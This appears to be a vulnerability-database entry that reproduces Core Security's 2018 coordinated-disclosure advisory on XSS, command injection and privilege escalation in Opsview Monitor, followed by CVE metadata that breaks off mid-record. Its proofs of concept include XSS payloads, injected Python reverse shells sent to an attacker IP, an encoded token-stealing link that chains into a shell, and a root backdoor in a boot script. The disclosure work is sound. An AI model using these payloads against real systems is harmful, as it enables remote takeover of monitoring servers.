Search criteria
53 vulnerabilities found for Opsview by Opsview
VAR-201809-0905
Vulnerability from variot - Updated: 2023-12-18 12:01The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a cross-site scripting vulnerability that allows an attacker to exploit malicious JavaScript code in the context of a legitimate user. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities Advisory ID: CORE-2018-0008 Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities Date published: 2018-09-04 Date of last update: 2018-09-04 Vendors contacted: Opsview Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4 . Opsview Monitor 5.3 . Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues. Opsview Monitor 6.0 . Opsview Monitor 5.4.2 . Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new . https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.
7.1.
The following proof of concept demonstrates the vulnerability:
/----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/
7.2. The following proof of concept demonstrates the vulnerability:
/----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point that this XSS is self stored and it's executed only in the context of the victim's session. Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3. Notification abuse leading to remote command execution
[CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) $ uname -a Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux -----/
7.5. Script modification could allow local privilege escalation
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges and the scripts that run at boot time, impersonate nagios user during its execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/----- /etc/init.d/opsview-reporting-module:
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null if [ $? != 0 ]; then echo "Attempted to start jasperserver but MySQL credentials are wrong." exit 0 fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null if [ $? = 0 ] ; then su - opsview -c "$DAEMON $@" else exec $DAEMON $@ fi -----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/----- ls -ltr /opt/opsview/jasper/bin/db_jasper -rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper nagios@image-builder-299:/home/admin$ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;;
esac
shift
done -----/
/----- $nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 45566)
id
uid=0(root) gid=0(root) groups=0(root) -----/
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send draft advisory. 2018-05-04: Opsview replied attaching its GPG keys. 2018-05-04: Core Security sent the encrypted draft advisory. 2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th. 2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that were planning to release a fix for these versions by the end of July. 2018-05-11: Core Security thanked the confirmation. 2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August. 2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date. 2018-07-16: Core Security requested a status update. 2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions. 2018-07-18: Core Security agreed with the Opsview's proposal. 2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product. 2018-08-06: Core Security requested a status update for the remaining fixes. 2018-08-13: Opsview replied saying that they were targeting the week of August 24th for release the fixes of their earlier product versions and they would confirm the exact date at the end of the next week. 2018-08-13: Core Security thanked the reply. 2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th. 2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date. 2018-08-28: Opsview agreed on the proposed release date. 2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0905",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.3.1"
},
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.0"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.3"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.1"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16147"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16147",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-16147",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-17454",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-16147",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16147",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-17454",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-156",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-16147",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
